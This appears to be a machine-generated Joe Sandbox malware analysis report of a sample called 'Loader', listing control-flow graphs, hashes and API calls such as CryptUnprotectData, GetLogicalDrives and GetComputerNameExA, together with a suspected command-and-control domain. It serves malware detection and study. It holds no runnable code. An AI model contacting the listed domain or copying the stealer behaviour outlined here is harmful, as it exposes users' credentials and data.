                                                                                                                control_flow_graph 505 4227c0-42280e 506 422810-42284f 505->506 506->506 507 422851-422892 RtlExpandEnvironmentStrings 506->507 508 4228a0-4228b2 507->508 508->508 509 4228b4-4228be 508->509 510 422900 509->510 511 422a20-422a29 509->511 512 422a10-422a17 509->512 513 422ba0 509->513 514 422921-42292a 509->514 515 422914-422920 509->515 516 4228c5-4228cb 509->516 517 422908-422911 call 408070 509->517 510->517 520 422a32 511->520 521 422a2b-422a30 511->521 512->511 518 422933 514->518 519 42292c-422931 514->519 522 4228d4 516->522 523 4228cd-4228d2 516->523 517->515 525 42293a-422977 call 408060 518->525 519->525 526 422a39-422adb call 408060 520->526 521->526 527 4228d7-4228f9 call 408060 RtlExpandEnvironmentStrings 522->527 523->527 535 422980-422992 525->535 536 422ae0-422b06 526->536 527->510 527->511 527->512 527->513 527->514 527->515 527->517 535->535 537 422994-42299c 535->537 536->536 538 422b08-422b10 536->538 539 4229c1-4229cd 537->539 540 42299e-4229a3 537->540 541 422b12-422b19 538->541 542 422b31-422b3d 538->542 544 4229f1-4229fc call 43fa80 539->544 545 4229cf-4229d3 539->545 543 4229b0-4229bf 540->543 546 422b20-422b2f 541->546 547 422b61-422b81 GetLogicalDrives call 43fa80 542->547 548 422b3f-422b43 542->548 543->539 543->543 553 422a01-422a09 544->553 550 4229e0-4229ef 545->550 546->542 546->546 555 422f12 547->555 556 422f10 547->556 557 422ba6-422bc7 547->557 558 422f27 547->558 559 422b9a 547->559 560 422b88-422b92 547->560 561 422f18-422f1e call 408070 547->561 562 422cee-422cf7 call 408070 547->562 563 422efc-422f01 547->563 552 422b50-422b5f 548->552 550->544 550->550 552->547 552->552 553->511 553->512 553->513 555->561 566 422bd0-422bf3 557->566 558->558 559->513 560->559 561->558 562->563 563->556 566->566 569 422bf5-422c7f 566->569 570 422c80-422cbd 569->570 570->570 571 422cbf-422ce6 call 4205d0 570->571 571->562
                                                                                                                APIs
                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 00422883
                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 004228EA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                                • String ID: @P$Pj$]I$pq
                                                                                                                • API String ID: 237503144-2599363960
                                                                                                                • Opcode ID: e239aa4a95ff57b576cd01c30de73f46c241d395860bed3c7043ce247567fecd
                                                                                                                • Instruction ID: 71a907800d894f88ba1bcd9300870bfbcbc0a57d33380a38f61f95972a31f3c0
                                                                                                                • Opcode Fuzzy Hash: e239aa4a95ff57b576cd01c30de73f46c241d395860bed3c7043ce247567fecd
                                                                                                                • Instruction Fuzzy Hash: D0D10FB06083109FD310DF29E99162BBBE0FF86314F054A6DE9D59B3A0D7B89905CB57

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 574 421a9f-421aaf 575 421ab6-421ad6 574->575 576 421b47-421bd8 574->576 577 421ae0-421b07 575->577 578 421be0-421c0d 576->578 577->577 579 421b09-421b18 577->579 578->578 580 421c0f-421c2f 578->580 582 421fc8-421fcd 579->582 583 421b1e-421b26 579->583 581 421c30-421cc0 580->581 581->581 584 421cc6-421cf3 581->584 586 421fd4-421fd6 582->586 587 421fdb-422019 582->587 588 4220cb-4220d7 582->588 585 421b30-421b37 583->585 592 421d00-421d58 584->592 593 421f9c-421fa2 585->593 594 421b3d-421b40 585->594 589 4226e7-4226f3 586->589 590 422025-422037 587->590 591 42201b-422022 587->591 595 422102-422116 588->595 596 422460-42246f 588->596 597 422476-422482 588->597 598 4220de-4220fb 588->598 599 422040-422067 590->599 591->590 592->592 600 421d5a-421d68 592->600 593->582 601 421fa4-421fc0 call 43c680 593->601 594->585 602 421b42 594->602 605 422123-422149 call 43e160 * 2 595->605 606 422150-422175 call 43e160 * 2 595->606 607 4221a1-4221ae 595->607 608 4221b5-4221d1 595->608 609 42217e-42219a 595->609 610 42211d 595->610 596->595 596->597 597->595 597->596 603 422489-42249e 597->603 604 4224bf-4224cf 597->604 598->595 598->596 598->597 599->599 612 422069-422074 599->612 613 421d6a-421d6f 600->613 614 421d7b-421d83 600->614 635 421fc5 601->635 602->582 603->596 603->604 618 4224b0-4224b8 603->618 604->618 623 4224f0-42250c 604->623 624 4224d6-4224e9 604->624 605->606 606->609 607->607 607->608 619 422536-422541 607->619 620 4221e0-4221f3 608->620 621 4221fa 608->621 622 4223bf-4223cb 608->622 609->607 617 422548-42257c call 40a8c0 609->617 610->605 642 422076-422085 612->642 643 4220ac-4220c4 612->643 644 421d70-421d79 613->644 645 421d85-421d86 614->645 646 421d9b-421da4 614->646 627 422583-42259c 617->627 628 422630-422647 617->628 629 4225d0-4225dd 617->629 630 4225b0-4225c9 617->630 631 4225e4-422602 617->631 632 422609-42261b 617->632 618->596 618->604 619->607 619->617 619->627 619->628 619->629 619->630 619->631 619->632 620->621 620->622 638 422200-422218 621->638 636 4223d2-4223e6 622->636 637 422222-42222d 622->637 622->638 639 422240-422276 622->639 640 422234-422236 622->640 641 422409-422418 622->641 623->596 623->604 625 422520-42252f 623->625 624->618 624->623 625->589 625->607 625->619 627->629 627->630 627->631 627->632 654 422650-422671 628->654 629->630 629->631 630->629 630->631 630->632 631->629 631->630 631->632 632->628 635->582 636->589 636->641 649 4223f0-422402 636->649 655 4226d4-4226e4 636->655 656 422449-422453 636->656 657 42241f-422442 636->657 637->639 637->640 638->637 639->620 639->641 648 4222f0 639->648 639->649 650 4222e6 639->650 651 422294-4222dd 639->651 640->620 640->639 640->641 640->648 640->649 640->650 640->651 641->589 641->655 641->656 641->657 658 422090-422097 642->658 643->586 643->587 643->588 644->614 644->644 659 421d90-421d99 645->659 660 421da6-421daa 646->660 661 421dbb-421dc7 646->661 664 4222f5-422307 648->664 649->589 649->641 649->655 649->656 649->657 650->664 651->650 654->654 668 422673-42267a 654->668 655->589 656->589 657->655 657->656 669 4220a0-4220a6 658->669 670 422099-42209c 658->670 659->646 659->659 671 421db0-421db9 660->671 672 421de1-421deb 661->672 673 421dc9-421dcb 661->673 677 422310-422337 664->677 668->625 679 422680-42268f 668->679 669->643 681 4226f6-422716 call 43c680 669->681 670->658 680 42209e 670->680 671->661 671->671 674 421e0b-421eef 672->674 675 421ded-421df1 672->675 684 421dd0-421ddd 673->684 687 421ef0-421f28 674->687 686 421e00-421e09 675->686 677->677 688 422339-422341 677->688 689 422690-422697 679->689 680->643 691 42271b-422733 681->691 684->684 690 421ddf 684->690 686->674 686->686 687->687 692 421f2a-421f4b 687->692 688->620 693 422347-422356 688->693 694 4226a3-4226a9 689->694 695 422699-42269c 689->695 690->672 696 421f50-421f72 692->696 697 422360-422367 693->697 694->625 699 4226af-4226cf call 43c680 694->699 695->689 698 42269e 695->698 696->696 700 421f74-421f9a call 40b920 696->700 701 422373-422379 697->701 702 422369-42236c 697->702 698->625 699->625 699->655 700->586 701->620 706 42237f-42239d call 43c680 701->706 702->697 705 42236e 702->705 705->620 710 4223a2-4223b8 706->710 710->621 710->622
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ;:98$;:98$stingyerasjhru.click$|wpq$}$}
                                                                                                                • API String ID: 0-2503221673
                                                                                                                • Opcode ID: fc97829492ef5a1bbadb1ae2cf36adcb21381e7223bc749dce3476e95c0759cb
                                                                                                                • Instruction ID: bfcda4fc78958a6423a0c8389ef30b1a46821ce83e665f29af7813df555f6f45
                                                                                                                • Opcode Fuzzy Hash: fc97829492ef5a1bbadb1ae2cf36adcb21381e7223bc749dce3476e95c0759cb
                                                                                                                • Instruction Fuzzy Hash: 07623275618350DFE314CF29D89176BB7E2EB96310F49893CE8859B3A1D7389805CB86

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 711 40cdf5-40ce02 712 40ce10-40ce2a 711->712 712->712 713 40ce2c-40ce51 call 408600 712->713 716 40ce60-40ce7a 713->716 716->716 717 40ce7c-40cedf 716->717 718 40cee0-40cf00 717->718 718->718 719 40cf02-40cf13 718->719 720 40cf15-40cf1f 719->720 721 40cf2b-40cf33 719->721 722 40cf20-40cf29 720->722 723 40cf35-40cf36 721->723 724 40cf4b-40cf58 721->724 722->721 722->722 725 40cf40-40cf49 723->725 726 40cf5a-40cf61 724->726 727 40cf7b-40cf83 724->727 725->724 725->725 730 40cf70-40cf79 726->730 728 40cf85-40cf86 727->728 729 40cf9b-40d0b3 727->729 731 40cf90-40cf99 728->731 732 40d0c0-40d0fa 729->732 730->727 730->730 731->729 731->731 732->732 733 40d0fc-40d126 732->733 734 40d130-40d15f 733->734 734->734 735 40d161-40d18b call 40b920 734->735 737 40d190-40d1d3 735->737
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: MNZb$R@IZ$RDAZ$]JIZ$stingyerasjhru.click$|wpq
                                                                                                                • API String ID: 0-3882712551
                                                                                                                • Opcode ID: a3d295e4de677f5778693720a6860ed01dc2677b5911d9165943ced07ce48a97
                                                                                                                • Instruction ID: 6bcef89fab22a0be91c3f9a17b5d93c497e4fcc09e780d798163f71dcfc5c1fb
                                                                                                                • Opcode Fuzzy Hash: a3d295e4de677f5778693720a6860ed01dc2677b5911d9165943ced07ce48a97
                                                                                                                • Instruction Fuzzy Hash: 9581FDB054C3C18AD331CF24D5943EFBBE1EBA6344F188A6CD8D96B281C7790906CB96

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 738 408680-408691 call 43bff0 741 408697-40869e call 434100 738->741 742 408998-40899a ExitProcess 738->742 745 408993 call 43c600 741->745 746 4086a4-4086cc GetCurrentProcessId GetCurrentThreadId 741->746 745->742 747 4086d0-4086df 746->747 748 4086ce 746->748 750 4086e1 747->750 751 4086e3-4086f2 747->751 748->747 750->751 752 4086f4-4086f6 751->752 753 4086f8-4086fd 751->753 754 408700-40870b 752->754 753->754 755 40870d 754->755 756 40870f-408719 754->756 755->756 757 40871b 756->757 758 40871d-408730 756->758 757->758 759 408732 758->759 760 408734-408814 SHGetSpecialFolderPathW 758->760 759->760 761 408820-40884e 760->761 761->761 762 408850-40887f call 43ac00 761->762 765 408880-40889c 762->765 766 4088b6-4088c9 GetForegroundWindow 765->766 767 40889e-4088b4 765->767 768 40895d-408975 call 409c00 766->768 769 4088cf-40895b 766->769 767->765 772 408981-408988 768->772 773 408977 call 40cd30 768->773 769->768 772->745 775 40898a-408990 call 408070 772->775 776 40897c call 40b8f0 773->776 775->745 776->772
                                                                                                                APIs
                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 004086A4
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 004086AE
                                                                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004087F3
                                                                                                                • GetForegroundWindow.USER32 ref: 004088C1
                                                                                                                • ExitProcess.KERNEL32 ref: 0040899A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 4063528623-0
                                                                                                                • Opcode ID: 8cd03c9aebe90ec96d0acda4b507a42559c6704a5c62887d39afadd0e4775307
                                                                                                                • Instruction ID: ccd327b76600f316a802d86e88ae0a5f1c3465088a91ef0362b94d5ec249e6b1
                                                                                                                • Opcode Fuzzy Hash: 8cd03c9aebe90ec96d0acda4b507a42559c6704a5c62887d39afadd0e4775307
                                                                                                                • Instruction Fuzzy Hash: 9B714677F447090BC718AE69CD4636AB6C79BC9310F1A853DA985EB3D2FDB88C014789

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 780 418b32-418b35 781 418ba3-418ba5 780->781 782 418c32-418c45 call 43e160 780->782 783 418b88-418b8a 780->783 784 418baa-418be8 780->784 785 418b3c-418b5d call 43e160 780->785 786 418b8f-418b9c 780->786 787 418bef-418c2b 780->787 781->782 793 418c4e-418c61 call 43e160 782->793 783->793 784->782 784->787 797 418b62-418b81 CryptUnprotectData 785->797 786->781 786->782 786->784 786->787 787->781 787->782 787->783 787->784 787->785 787->786 787->787 788 418b30 787->788 789 418a26-418a46 787->789 790 41893c-41895f 787->790 788->780 794 418a50-418a81 789->794 796 418960-418991 790->796 805 418c67 793->805 794->794 799 418a83-418a97 794->799 796->796 801 418993-4189a7 796->801 797->781 797->782 797->783 797->784 797->786 797->787 802 418aa0-418aba 799->802 803 4189b0-4189ca 801->803 802->802 804 418abc-418acb 802->804 803->803 806 4189cc-4189d4 803->806 807 418ad1-418ad9 804->807 808 418a20 804->808 805->805 806->789 809 4189d6-4189df 806->809 810 418ae0-418aec 807->810 808->789 811 4189e5-4189f1 809->811 814 418aee 810->814 815 4189f3 811->815 814->808 815->789
                                                                                                                APIs
                                                                                                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00418B78
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CryptDataUnprotect
                                                                                                                • String ID: ;:98$L4$L4
                                                                                                                • API String ID: 834300711-169395199
                                                                                                                • Opcode ID: 1b7a2fb6dba432fb6ce72c8c75801ca01b980b67b4b405a52c79328edc1b9b37
                                                                                                                • Instruction ID: 0a5aaf2ac1193fa4db8f6bafd72326092417ecf968f37223863fcf32e38b92ef
                                                                                                                • Opcode Fuzzy Hash: 1b7a2fb6dba432fb6ce72c8c75801ca01b980b67b4b405a52c79328edc1b9b37
                                                                                                                • Instruction Fuzzy Hash: F55124346093508FD7748F28E8857AF77E2BB92318F15893DC8D997251DF3848868B86

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 820 432538-432616 call 414900 GetSystemMetrics * 2 828 43261d-4326ae 820->828
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MetricsSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 4116985748-3916222277
                                                                                                                • Opcode ID: 375182f4c78399503ffa56f71cb2b893134d4bade9cce48f02d1f9fa4a337abe
                                                                                                                • Instruction ID: cbd2f91c6e7bccfd09645db563301c5a2dc48dfd55df8df2e1702483762c6b95
                                                                                                                • Opcode Fuzzy Hash: 375182f4c78399503ffa56f71cb2b893134d4bade9cce48f02d1f9fa4a337abe
                                                                                                                • Instruction Fuzzy Hash: 8E516FB4E142199FDB40EFACDA85A9EBBF0BB88300F114529E498E7350D774AD44CF96
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: &2$sa
                                                                                                                • API String ID: 0-4107202647
                                                                                                                • Opcode ID: 46ecec437e0597b443adb83a7556ffd458587901ad055bee4c8ca4e741694985
                                                                                                                • Instruction ID: 48d5fc48ca05be7950f03ce4e9563392a146bab8ca988be822cefd75bdadf585
                                                                                                                • Opcode Fuzzy Hash: 46ecec437e0597b443adb83a7556ffd458587901ad055bee4c8ca4e741694985
                                                                                                                • Instruction Fuzzy Hash: E82121657142118BC714EF38DC2267BB7E4EF92360F555A2DE492CB291FB38C800C79A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c774e2834ef6efbd23922a019a0a9966c2fe50317b4ef1ddf5f97c46753b741f
                                                                                                                • Instruction ID: c9d59ac26e7013e0449e48f1ca5cfa9e0e8c7b4477680cb95e27e7d750a1601a
                                                                                                                • Opcode Fuzzy Hash: c774e2834ef6efbd23922a019a0a9966c2fe50317b4ef1ddf5f97c46753b741f
                                                                                                                • Instruction Fuzzy Hash: 8282D675A04B408FD314DF39C885396BBE2AB99314F198A3ED5EBC77D1D638A845CB02
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e8e88ab2615ab9d128d6009e8b7137caa7b7ac94efe7f81d6b0b7ced3008dcfe
                                                                                                                • Instruction ID: 07b57d452cf168f4f8e7bb98b8d614196ebb20eb4ab483c693a899930df0cd56
                                                                                                                • Opcode Fuzzy Hash: e8e88ab2615ab9d128d6009e8b7137caa7b7ac94efe7f81d6b0b7ced3008dcfe
                                                                                                                • Instruction Fuzzy Hash: A551F8B150C3429FD714CF24D4A16AFB7E1AF99314F14892EE4DA87392D634EC85CB46
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: db2fd1b08c4ef73b6cffe389b2b20944d74cd73a8be859c08301e725f3f0b126
                                                                                                                • Instruction ID: 2a9c54b3382e0200f9d3d862f724d9cd0d7902b3f2ff327f908a372fd7a8f8a8
                                                                                                                • Opcode Fuzzy Hash: db2fd1b08c4ef73b6cffe389b2b20944d74cd73a8be859c08301e725f3f0b126
                                                                                                                • Instruction Fuzzy Hash: E141D3B190C641DFC724CF28D4917EBBBE1ABD5314F54892EE0D987342E639E885CB86
                                                                                                                APIs
                                                                                                                • LdrInitializeThunk.NTDLL(0043F89E,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C6AE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: @
                                                                                                                • API String ID: 0-2766056989
                                                                                                                • Opcode ID: 0b6793157d04601db4c10b6673c807c66360a9bf3393fdc6303ac6cd5aad9060
                                                                                                                • Instruction ID: 17d9e0fd99ced71ed9e3bde41cbfb5e4310ba1b6858c0277b5f4d97499ef8537
                                                                                                                • Opcode Fuzzy Hash: 0b6793157d04601db4c10b6673c807c66360a9bf3393fdc6303ac6cd5aad9060
                                                                                                                • Instruction Fuzzy Hash: B14123B59113118BDB24DF24C8927ABB7B1EF49304F18945ED886BB351D7789801CB99
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID: ;:98
                                                                                                                • API String ID: 2994545307-152368606
                                                                                                                • Opcode ID: 24a80477aa382a62f4210ddd4f75b5cdb44d8503a87fd2c1e569ab589761bbe6
                                                                                                                • Instruction ID: ac84a51835b690dedaff18edfced9a70b225f25b84eff310572fca7130ed8c12
                                                                                                                • Opcode Fuzzy Hash: 24a80477aa382a62f4210ddd4f75b5cdb44d8503a87fd2c1e569ab589761bbe6
                                                                                                                • Instruction Fuzzy Hash: 3E318A742847524BD7148F25D8C1BB2BBA2EB53300F0D95BEC4C68B292D63C9817C729
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0d621e1c4d4ac966b42549a1e1447afbd6a195117149e6954d9e0b16fcf2476b
                                                                                                                • Instruction ID: 62966320435e87aeb235ea281a8478b4287878e17be31bb355f6cb4874596792
                                                                                                                • Opcode Fuzzy Hash: 0d621e1c4d4ac966b42549a1e1447afbd6a195117149e6954d9e0b16fcf2476b
                                                                                                                • Instruction Fuzzy Hash: DC5136317057518FD7188B28D890263BBE2EFD6320B5D8A6EC1964F7D2C338E806D799
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9a72924fa0aef9d971ed143c9146c968da883d9c09666bab5678f4fc21769217
                                                                                                                • Instruction ID: 3ed637b4dc2986f88705be734b29b6b2a2ce8135eef9c925d0643589607568d6
                                                                                                                • Opcode Fuzzy Hash: 9a72924fa0aef9d971ed143c9146c968da883d9c09666bab5678f4fc21769217
                                                                                                                • Instruction Fuzzy Hash: 4101D4242183D18BDB128F3990913327BA0EF13314B58549AC4D6DF397D724D502CB69
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ea52521d8585b467ac2567aea9b9f1dbb4d34ddaf940849f6c720ecf54530fd6
                                                                                                                • Instruction ID: 9506e49e94a3480182712f05826181e76c4c23759d8b3728f738625f502a090d
                                                                                                                • Opcode Fuzzy Hash: ea52521d8585b467ac2567aea9b9f1dbb4d34ddaf940849f6c720ecf54530fd6
                                                                                                                • Instruction Fuzzy Hash: DD01F936F412124BE718CF64CC917AEB362EBC5310F19C13ED51177291C7B86802868C
                                                                                                                APIs
                                                                                                                • GetForegroundWindow.USER32 ref: 0043C8A4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ForegroundWindow
                                                                                                                • String ID: PSLM
                                                                                                                • API String ID: 2020703349-3490872691
                                                                                                                • Opcode ID: d17aa40d1b5ccecf68c69e3162f5464a46b817d8645d8795cd70ee0713df063c
                                                                                                                • Instruction ID: fbf3916a822c5aef83fe6bc8121c5ef06820eb40b307e3d046c7c7840cde770b
                                                                                                                • Opcode Fuzzy Hash: d17aa40d1b5ccecf68c69e3162f5464a46b817d8645d8795cd70ee0713df063c
                                                                                                                • Instruction Fuzzy Hash: DCF027749000528FDF00EF68AC4A3BA33E0EB1A219F141C7AD14BE2291C27885018F19
                                                                                                                APIs
                                                                                                                • FreeLibrary.KERNEL32 ref: 0042B306
                                                                                                                • GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 0042B3B7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ComputerFreeLibraryName
                                                                                                                • String ID:
                                                                                                                • API String ID: 2904949787-0
                                                                                                                • Opcode ID: aeb56d120df572d0a2705e1f8ee3b7f92eb514697b0bd6caa423dde0963aca49
                                                                                                                • Instruction ID: d3cae323e07e06b5c01e82f0385368494965ffc0fdfc1e8f8ed08c37b90993c9
                                                                                                                • Opcode Fuzzy Hash: aeb56d120df572d0a2705e1f8ee3b7f92eb514697b0bd6caa423dde0963aca49
